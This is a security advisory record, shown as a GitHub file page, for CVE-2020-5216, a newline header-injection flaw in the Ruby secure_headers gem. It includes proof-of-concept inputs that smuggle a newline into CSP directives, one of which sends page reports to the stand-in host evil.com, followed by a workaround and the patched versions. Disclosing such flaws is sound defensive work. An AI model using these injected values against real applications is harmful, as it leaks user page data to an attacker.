-
-
Notifications
You must be signed in to change notification settings - Fork 218
/
CVE-2020-5216.yml
50 lines (41 loc) · 1.49 KB
/
CVE-2020-5216.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
---
gem: secure_headers
cve: 2020-5216
ghsa: w978-rmpf-qmwg
url: https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg
date: 2020-01-23
title: secure_headers header injection due to newline
description: |
If user-supplied input was passed into append/override_content_security_policy_directives,
a newline could be injected leading to limited header injection.
Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy
header with the remaining value of the original string. It will continue to create new headers
for each newline.
e.g.
```
override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])
```
would result in
```
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header
```
CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
```
override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
```
```
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header
```
Workarounds
```
override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
```
cvss_v3: 4.4
patched_versions:
- "~> 3.9"
- "~> 5.2"
- ">= 6.3.0"